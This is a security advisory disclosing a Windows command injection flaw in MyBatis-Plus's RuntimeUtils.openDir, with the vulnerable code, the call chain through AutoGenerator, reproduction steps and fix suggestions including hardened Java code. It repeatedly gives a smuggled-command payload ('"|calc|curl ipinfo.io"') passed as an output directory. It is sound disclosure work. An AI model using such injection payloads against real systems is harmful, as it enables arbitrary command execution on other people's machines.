Affected Artifact
[com.baomidou:mybatis-plus-core](https://mvnrepository.com/artifact/com.baomidou/mybatis-plus-core)
Affected Version
All versions before the latest (3.5.4.1)
Describe the Vulnerability
Root cause
There is a method com.baomidou.mybatisplus.generator.util.RuntimeUtils.openDir:

```java
public static void openDir(String outDir) throws IOException {
    String osName = System.getProperty("os.name");
    ......
    if (osName.contains("Windows")) {
        // outDir is interpolated into a cmd.exe command line as a quoted string
        Runtime.getRuntime().exec(MessageFormat.format("cmd /c start \"\" \"{0}\"", outDir));
    }
    ......
}
```
cmd /c is used to execute a command. However, interpolating outDir into that command line introduces command truncation injection: if a dangerous parameter is passed to openDir, malicious commands are executed. For example,

```java
RuntimeUtils.openDir("\"|calc|curl ipinfo.org\"");
```

In the above case, the first `\"` closes the opening quotation mark and the last `\"` closes the closing one. The pipe operator then carries out the truncation injection, so arbitrary commands can be executed, such as opening a calculator on Windows, running curl, or executing other dangerous commands.
Influence (Attack Scenario)
There exists the following call chain:

```
com.baomidou.mybatisplus.generator.AutoGenerator.execute(com.baomidou.mybatisplus.generator.engine.AbstractTemplateEngine) -->
com.baomidou.mybatisplus.generator.engine.AbstractTemplateEngine.open() -->
com.baomidou.mybatisplus.generator.util.RuntimeUtils.openDir(java.lang.String)
```
AutoGenerator.execute calls AbstractTemplateEngine.open, which finally calls RuntimeUtils.openDir. Therefore, if a dangerous configuration is passed to AutoGenerator.execute, malicious commands are executed. For example,

```java
AutoGenerator mpg = new AutoGenerator();
GlobalConfig gc = new GlobalConfig();
......
gc.setOutputDir("\"|calc|curl ipinfo.io\"");
......
mpg.execute();
```
To Reproduce
Follow the documentation (https://baomidou.com/pages/d357af/#%E6%B7%BB%E5%8A%A0%E4%BE%9D%E8%B5%96) and pass the crafted value shown below to setOutputDir.

```java
AutoGenerator mpg = new AutoGenerator();
GlobalConfig gc = new GlobalConfig();
......
gc.setOutputDir("\"|calc|curl ipinfo.io\"");
......
mpg.execute();
```
Note:
Although the documentation says "3.5.1 and below are applicable" (适用版本: mybatis-plus-generator 3.5.1 以下版本), this is not accurate: AutoGenerator has not been removed in the latest version, 3.5.4.1.
Fix Suggestion
There are two ways to fix it.

One is a relatively modest fix: do not use cmd /c. Because of the secure implementation of Runtime.getRuntime().exec() in Java, command truncation injection cannot be carried out on its own; wrapping the path in cmd /c is what introduces the truncation injection problem. However, dropping cmd /c does not completely fix the vulnerability. An attacker can still launch an arbitrary executable through a configuration such as gc.setOutputDir("C:\\Windows\\System32\\calc.exe");, and library users have not been told that outputDir is treated as a command to be executed. Thus, the most important step is to update the documentation and warn library users of this danger.

The other is a complete fix. Within the whole MyBatis-Plus project, only AbstractTemplateEngine uses RuntimeUtils, and its apparent purpose is merely to show the user where outputDir is, so there is no need to execute outputDir at all. Therefore, we strongly suggest removing RuntimeUtils.java from the project.
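As an added illustration of the modest fix and of the root cause above (example code written for this report, not MyBatis-Plus's own), the following hardened openDir accepts outputDir only if it names an existing directory and hands it to the OS without ever building a cmd.exe command line; the class name SafeOpenDir and the explorer.exe fallback are assumptions.

```java
import java.awt.Desktop;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Arrays;

/** Hardened stand-in for RuntimeUtils.openDir (example code, not MyBatis-Plus's). */
public final class SafeOpenDir {
    /** Accept outDir only if it names an existing directory; no shell ever sees the string. */
    static Path validateOutputDir(String outDir) {
        Path p;
        try {
            p = Paths.get(outDir).toAbsolutePath().normalize();
        } catch (InvalidPathException e) {
            // On Windows, characters such as " and | are illegal in a path,
            // so the payload from this report fails here before anything runs.
            throw new IllegalArgumentException("outputDir is not a valid path: " + outDir, e);
        }
        if (!Files.isDirectory(p)) {
            throw new IllegalArgumentException("outputDir is not an existing directory: " + p);
        }
        return p;
    }

    public static void openDir(String outDir) throws IOException {
        Path dir = validateOutputDir(outDir);
        if (Desktop.isDesktopSupported() && Desktop.getDesktop().isSupported(Desktop.Action.OPEN)) {
            Desktop.getDesktop().open(dir.toFile()); // the OS opens the folder; no command line is built
            return;
        }
        if (System.getProperty("os.name").contains("Windows")) {
            // Argument-list form: the path is one argv element of explorer.exe, so
            // cmd.exe metacharacters (|, &, ") are never interpreted by a shell.
            new ProcessBuilder("explorer.exe", dir.toString()).start();
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: the payload quoted in this report and a harmless directory.
        for (String candidate : Arrays.asList("\"|calc|curl ipinfo.io\"", System.getProperty("java.io.tmpdir"))) {
            try {
                System.out.println("accepted: " + validateOutputDir(candidate));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

On Linux or macOS the payload is a syntactically valid path, so it is rejected by the directory check rather than by InvalidPathException; either way nothing is executed.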